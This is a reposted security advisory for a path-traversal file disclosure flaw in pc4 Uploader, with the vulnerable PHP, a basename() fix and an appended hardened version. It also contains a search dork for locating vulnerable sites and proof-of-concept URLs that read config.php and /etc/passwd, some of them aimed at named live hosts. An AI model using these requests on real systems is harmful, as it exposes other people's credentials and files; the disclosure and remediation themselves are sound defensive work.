pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability

2009.06.27
Credit: none
Risk: High
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

=Vuln: pc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability
=INFO: http://pc4arb.com/article-48.html
=BUY: ~~~
=Download: ~~~
=DORK: intext:"Pictures of Whale Penis"

_-=/:Conditions:\=-_
none
---------------------------------------===--------------------------------------

_-=/:Vulnerable_Code:\=-_
// in "./pc4uploader/upfiles/index.php"
function displayimage( $fn, $lastMod, $fs ) {
    global $out_Types;
    $ext = explode( ".", $fn );
    $ext_i = count( $ext ) - 1;
    $file_ext = $ext[$ext_i];
    header( "Last-Modified: ".$lastMod );
    header( "ETag: ".getetag( $fn ) );
    header( "Accept-Ranges: bytes" );
    header( "Content-Length: ".$fs );
    header( "Content-Type: ".$out_Types[$file_ext] );
    $fp = fopen( $fn, "rb" );   // <-- opens $fn with no filtering or precautions taken
    if ( function_exists( 'fpassthru' ) ) {
        fpassthru( $fp );
    } else {
        $temp = fread( $fp, $fs );
        echo $temp;
    }
    fclose( $fp );
    return;
}

// Function displayimage() is later called
$file = $_GET['file'];   // <-- again, not filtered or validated in any way
//..
//..
displayimage( $file, "Thu, 01 Jan 2006 12:00:00 GMT", $fs );
---------------------------------------===--------------------------------------

_-=/:P.o.C:\=-_
http://localhost/pc4uploader/upfiles/index.php?file=../config.php
http://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd

demo:
http://upload.traidnt.net/upfiles/index.php?file=../config.php {Save File to view the code if needed}
http://uploader.pc4arb.com/upfiles/index.php?file=../config.php {view source}
---------------------------------------===--------------------------------------

_-=/:SOLUTION:\=-_
// Use this displayimage() function instead; notice the changes.
function displayimage( $fn, $lastMod, $fs ) {
    global $out_Types;
    $fn = basename( $fn );   // strip any directory component from the requested name
    $ext = explode( ".", $fn );
    $ext_i = count( $ext ) - 1;
    $file_ext = $ext[$ext_i];
    header( "Last-Modified: ".$lastMod );
    header( "ETag: ".getetag( $fn ) );
    header( "Accept-Ranges: bytes" );
    header( "Content-Length: ".$fs );
    header( "Content-Type: ".$out_Types[$file_ext] );
    $fp = fopen( $fn, "rb" );
    if ( function_exists( 'fpassthru' ) ) {
        fpassthru( $fp );
    } else {
        $temp = fread( $fp, $fs );
        echo $temp;
    }
    fclose( $fp );
    return;
}
// I added $fn = basename($fn); it converts anything like "../../config.php" to "config.php".
// Since config.php doesn't exist in ./upfiles/, the script does the rest by giving a safe error.
// Also move ./include/default.gif to ./upfiles/default.gif.
// Everything should be good :)
---------------------------------------===--------------------------------------
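As an added example that is not part of the original advisory or the pc4 Uploader code, a stricter replacement for displayimage(): basename() stops traversal, but it still allows any file name inside the upfiles directory, including the application's own .php scripts, so this version also restricts the extension to the $out_Types allowlist and confirms the realpath() result stays under the upload directory. The $uploadDir value and the small $out_Types map below are assumed, and the ETag is derived from the file hash instead of the script's getetag() helper.

```php
<?php
// Added example, not from the original advisory or pc4 Uploader.
// Assumed: $uploadDir is the directory uploaded files live in and
// $out_Types is the script's extension -> MIME map (constructed sample here).
$uploadDir = realpath( __DIR__ );
$out_Types = array( 'jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif' );

// Returns array( absolute path, MIME type ), or false when the request must be refused.
function safe_upload_path( $requested, $baseDir, $allowedTypes ) {
    // 1. Reduce the user value to a bare file name: removes "../" and absolute prefixes.
    $name = basename( $requested );
    if ( $name === '' || $name[0] === '.' ) {
        return false;                                   // "", ".", "..", dotfiles
    }
    // 2. Serve only extensions with a known output type; this also refuses
    //    the application's own .php sources sitting in the same directory.
    $ext = strtolower( pathinfo( $name, PATHINFO_EXTENSION ) );
    if ( $ext === '' || !isset( $allowedTypes[$ext] ) ) {
        return false;
    }
    // 3. Resolve symlinks and confirm the result is still under $baseDir.
    $full = realpath( $baseDir . DIRECTORY_SEPARATOR . $name );
    if ( $full === false || !is_file( $full ) ) {
        return false;
    }
    if ( strpos( $full, $baseDir . DIRECTORY_SEPARATOR ) !== 0 ) {
        return false;
    }
    return array( $full, $allowedTypes[$ext] );
}

// Same signature as the original so the existing call site keeps working;
// $fs is ignored and the size is read from disk instead of taken from the caller.
function displayimage( $fn, $lastMod, $fs ) {
    global $out_Types, $uploadDir;
    $resolved = safe_upload_path( $fn, $uploadDir, $out_Types );
    if ( $resolved === false ) {
        http_response_code( 404 );
        exit( 'File not found' );
    }
    list( $path, $mime ) = $resolved;
    header( 'Last-Modified: ' . $lastMod );
    header( 'ETag: "' . md5_file( $path ) . '"' );
    header( 'Accept-Ranges: bytes' );
    header( 'Content-Length: ' . filesize( $path ) );
    header( 'Content-Type: ' . $mime );
    readfile( $path );
}

displayimage( isset( $_GET['file'] ) ? $_GET['file'] : '', gmdate( 'D, d M Y H:i:s' ) . ' GMT', 0 );
```

With this in place, requests such as file=../config.php or file=/etc/passwd are answered with a 404 instead of file contents, and a request for index.php in the same directory is refused because "php" is not in the allowlist.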


Copyright 2019, cxsecurity.com